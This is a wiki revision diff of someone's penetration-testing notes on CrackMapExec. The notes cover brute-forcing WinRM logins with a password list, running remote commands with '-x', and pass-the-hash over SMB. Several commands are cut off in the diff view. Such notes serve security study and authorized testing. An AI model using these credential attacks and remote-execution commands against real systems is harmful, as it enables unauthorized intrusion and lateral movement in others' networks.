cme
Differences
This shows you the differences between two versions of the page.
Both sides previous revisionPrevious revisionNext revision | Previous revision | ||
cme [2024/02/04 01:58] – gman | cme [2024/02/04 02:08] (current) – [CME & WinRM] gman | ||
---|---|---|---|
Line 4: | Line 4: | ||
* CrackMapExec (a.k.a CME) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks. | * CrackMapExec (a.k.a CME) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks. | ||
* Built with stealth in mind, CME follows the concept of “Living off the Land”: abusing built-in Active Directory features/ | * Built with stealth in mind, CME follows the concept of “Living off the Land”: abusing built-in Active Directory features/ | ||
+ | * See the [[https:// | ||
**Supported Protocols: | **Supported Protocols: | ||
Line 15: | Line 16: | ||
</ | </ | ||
- | **General Syntax: | + | **General Syntax:** |
- | * Examples: | + | |
- | * '' | + | |
- | * '' | + | |
- | • See the [[https:// | + | |
+ | < | ||
+ | crackmapexec < | ||
+ | </ | ||
+ | |||
+ | **Examples: | ||
+ | |||
+ | < | ||
+ | crackmapexec < | ||
+ | crackmapexec < | ||
+ | </ | ||
+ | |||
+ | ===== CME & WinRM ===== | ||
+ | |||
+ | **Syntax:** | ||
+ | |||
+ | < | ||
+ | crackmapexec winrm [target ip] -u administrator -p / | ||
+ | </ | ||
+ | |||
+ | You can use the '' | ||
+ | * But, if we can get into the admin account, we don't have to do priv esc (so we test with one username, " | ||
+ | * You should get a green " | ||
+ | |||
+ | Look over the output (from the top down): | ||
+ | * First line: you can see it actually connects to WinRM. | ||
+ | * NOTE: wsman is an implementation of WinRM: windows management. | ||
+ | |||
+ | **Execute Commands:** If you successfully found login credentials, | ||
+ | |||
+ | < | ||
+ | crackmapexec winrm [target ip] -u administrator -p [password]-x " | ||
+ | crackmapexec winrm [target ip] -u administrator -p [password] -x " | ||
+ | </ | ||
+ | |||
+ | You should get some happy feedback along with the results of your command execution. | ||
+ | * '' | ||
+ | |||
+ | ===== CME & Pass-the-Hash ===== | ||
+ | |||
+ | < | ||
+ | crackmapexec smb [target ip] -u Administrator -H " | ||
+ | </ | ||
+ | |||
+ | This should indicated whether or not it works. | ||
+ | * If you get a green **[+]** and **(Pwn3d!)** then it works and you can try the execution of commands on the system... | ||
+ | |||
+ | < | ||
+ | crackmapexec smb [target ip] -u Administrator -H " | ||
+ | </ | ||
+ | |||
+ | It should give you visual feedback about the command execution. And there you go. Execute what you want. | ||
+ | |||
+ | |||
+ | |||
+ | |||
+ | ---- | ||
cme.1707011935.txt.gz · Last modified: by gman